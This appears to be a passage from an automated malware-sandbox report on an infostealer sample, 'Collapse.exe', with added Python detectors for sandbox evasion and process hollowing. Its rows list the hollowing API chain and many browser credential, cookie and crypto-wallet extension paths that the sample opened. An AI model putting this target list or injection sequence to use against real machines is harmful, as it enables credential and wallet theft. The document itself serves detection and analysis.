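        if kind == "IWbemServices::ExecQuery":
            # Crude WQL parse: the class name is the token after FROM.
            words = ev["query"].lower().split()
            if "from" in words:
                cls = words[words.index("from") + 1]
                if cls in VM_FINGERPRINT_CLASSES:
                    f.vm_wmi_classes.add(cls)
        elif kind == "NtQuerySystemInformation" and ev["class"] == "SystemFirmwareTableInformation":
            f.firmware_table_query = True
        elif kind == "NtQueryInformationProcess" and ev["class"] == "ProcessDebugPort":
            f.debug_port_queries += 1
        elif kind == "PEB_READ":  # e.g. mov edi, fs:[30h]; TEB+0x30 holds the PEB pointer on x86
            f.peb_reads += 1
        elif kind == "NtDelayExecution":
            ms = delay_interval_to_ms(ev["interval"])
            f.longest_sleep_ms = max(f.longest_sleep_ms, ms)
            f.sleeps_per_thread[ev["tid"]] = f.sleeps_per_thread.get(ev["tid"], 0) + 1
    return f


# Constructed trace mirroring the report's signatures (not captured data).
SAMPLE_TRACE = [
    {"api": "IWbemServices::ExecQuery", "query": "SELECT * FROM Win32_VideoController"},
    {"api": "NtQuerySystemInformation", "class": "SystemFirmwareTableInformation"},
    {"api": "NtDelayExecution", "tid": 6252, "interval": -1_800_000_000},   # 180 s, relative
    *({"api": "NtDelayExecution", "tid": 7544, "interval": -100_000} for _ in range(6569)),  # 10 ms x 6569
    {"api": "IWbemServices::ExecQuery", "query": "SELECT * FROM Win32_BIOS"},
    {"api": "NtQueryInformationProcess", "class": "ProcessDebugPort"},
    {"api": "NtQueryInformationProcess", "class": "ProcessDebugPort"},
    {"api": "PEB_READ"},
    {"api": "PEB_READ"},
]

if __name__ == "__main__":
    print(analyse_trace(SAMPLE_TRACE).indicators())
```

The per-thread sleep count matters as much as the longest single sleep: a sandbox that fast-forwards one long NtDelayExecution still burns its analysis window on thousands of short ones, which is the pattern the "Thread sleep count: 6569 > 30" signature captures.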

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\Desktop\Collapse.exe | Code function: 0_2_032F58D1 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread
                          Source: C:\Users\user\Desktop\Collapse.exe | Memory written: C:\Users\user\Desktop\Collapse.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\Desktop\Collapse.exe | Process created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
                          Source: C:\Users\user\Desktop\Collapse.exe | Queries volume information: C:\Users\user\Desktop\Collapse.exe VolumeInformation
                          Source: C:\Users\user\Desktop\Collapse.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Collapse.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\Collapse.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
                          Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Collapse.exe, 00000001.00000002.3295956102.0000000001757000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe
                          Source: C:\Users\user\Desktop\Collapse.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
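
Editor's note, added example (not the report's and not the sample's code): the call chain in 0_2_032F58D1 is the textbook process-hollowing sequence. The loader spawns a copy of itself suspended (CreateProcessW; the "Process created" row), reads the primary thread's context (Wow64GetThreadContext, since the process runs under WoW64), typically reads the child's PEB to locate its image base (ReadProcessMemory), allocates at that base (VirtualAllocEx), writes a PE image beginning with 4D5A ("MZ") at 0x400000 (WriteProcessMemory; the "Memory written" row), redirects the thread to the new image (Wow64SetThreadContext) and resumes it. The Python detector below matches that sequence per target process in an ordered API trace and does not fire on the benign suspended-spawn-then-resume pattern that debuggers and installers produce. The Call schema, pids and tids are constructed, and the PE stub is only a header, not a real binary.

```python
"""Detect a process-hollowing API sequence in an ordered call trace.

Added example. Events are a constructed, simplified rendering of the chain the
report shows for 0_2_032F58D1; field names are assumptions of the example.
"""
from dataclasses import dataclass

CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit for CreateProcess
MZ = b"MZ"                      # DOS header magic; the report shows "value starts with: 4D5A"


@dataclass
class Call:
    api: str
    args: dict


def detect_hollowing(calls):
    """Return a dict describing a matched hollowing chain, or None.

    State is tracked per target: the suspended child's pid/tid from CreateProcess
    must be the ones used by the remote-memory and thread-context calls, so
    writes into unrelated processes don't produce a match. VirtualAllocEx is
    optional because some loaders write into the existing mapping.
    """
    target_pid = target_tid = image_base = None
    done = []

    for c in calls:
        api, a = c.api, c.args
        if api in ("CreateProcessW", "CreateProcessA") and a.get("creation_flags", 0) & CREATE_SUSPENDED:
            target_pid, target_tid, done = a["pid"], a["tid"], ["spawn_suspended"]
        elif target_pid is None:
            continue
        elif api in ("GetThreadContext", "Wow64GetThreadContext") and a.get("tid") == target_tid:
            if done[-1] == "spawn_suspended":
                done.append("read_context")
        elif api == "VirtualAllocEx" and a.get("pid") == target_pid:
            if done[-1] == "read_context":
                done.append("alloc_remote")
        elif api == "WriteProcessMemory" and a.get("pid") == target_pid:
            # The first write of a PE header into the target is the payload image;
            # later writes (sections, relocations) are ignored by the state machine.
            if done[-1] in ("alloc_remote", "read_context") and a["data"][:2] == MZ:
                image_base = a["address"]
                done.append("write_image")
        elif api in ("SetThreadContext", "Wow64SetThreadContext") and a.get("tid") == target_tid:
            if done[-1] == "write_image":
                done.append("set_context")
        elif api == "ResumeThread" and a.get("tid") == target_tid:
            if done[-1] == "set_context":
                done.append("resume")
                return {"target_pid": target_pid, "image_base": image_base, "phases": tuple(done)}
    return None


# Constructed header bytes, not a real executable.
PE_STUB = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"

# Constructed trace modelled on the report's call chain (pids/tids invented).
SAMPLE_TRACE = [
    Call("GetProcAddress", {"name": "Wow64SetThreadContext"}),
    Call("CreateProcessW", {"image": r"C:\Users\user\Desktop\Collapse.exe",
                            "creation_flags": CREATE_SUSPENDED, "pid": 4242, "tid": 4243}),
    Call("VirtualAlloc", {"size": 0x30000}),                       # local staging buffer
    Call("Wow64GetThreadContext", {"tid": 4243}),
    Call("ReadProcessMemory", {"pid": 4242, "address": 0x7FFDF008, "size": 4}),  # PEB->ImageBaseAddress
    Call("VirtualAllocEx", {"pid": 4242, "address": 0x400000, "size": 0x30000}),
    Call("WriteProcessMemory", {"pid": 4242, "address": 0x400000, "data": PE_STUB}),
    Call("WriteProcessMemory", {"pid": 4242, "address": 0x401000, "data": b"\xcc" * 16}),
    Call("Wow64SetThreadContext", {"tid": 4243}),
    Call("ResumeThread", {"tid": 4243}),
]

# A debugger-style suspended spawn with no memory writes must not match.
BENIGN_TRACE = [
    Call("CreateProcessW", {"image": "child.exe", "creation_flags": CREATE_SUSPENDED, "pid": 5000, "tid": 5001}),
    Call("ResumeThread", {"tid": 5001}),
]

if __name__ == "__main__":
    print(detect_hollowing(SAMPLE_TRACE))
    print(detect_hollowing(BENIGN_TRACE))
```

In an EDR this logic would be keyed on the Sysmon/ETW equivalents (process creation with the suspended flag, CreateRemoteThread/SetThreadContext telemetry, and cross-process writes); the MZ check on the first write is what distinguishes hollowing from the many legitimate cross-process writes a debugger performs.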

                          Stealing of Sensitive Information

                          Source: Yara match | File source: 1.2.Collapse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.2.Collapse.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Collapse.exe.42f9550.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000001.00000002.3294762708.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match | File source: Collapse.exe, type: SAMPLE
                          Source: Yara match | File source: 0.0.Collapse.exe.f40000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Collapse.exe.42f9550.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Collapse.exe.42f9550.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                          Source: Collapse.exe, 00000001.00000002.3295743874.0000000001733000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3WXK?\b
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
                          Source: Collapse.exe, 00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: set_UseMachineKeyStore
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\Desktop\Collapse.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
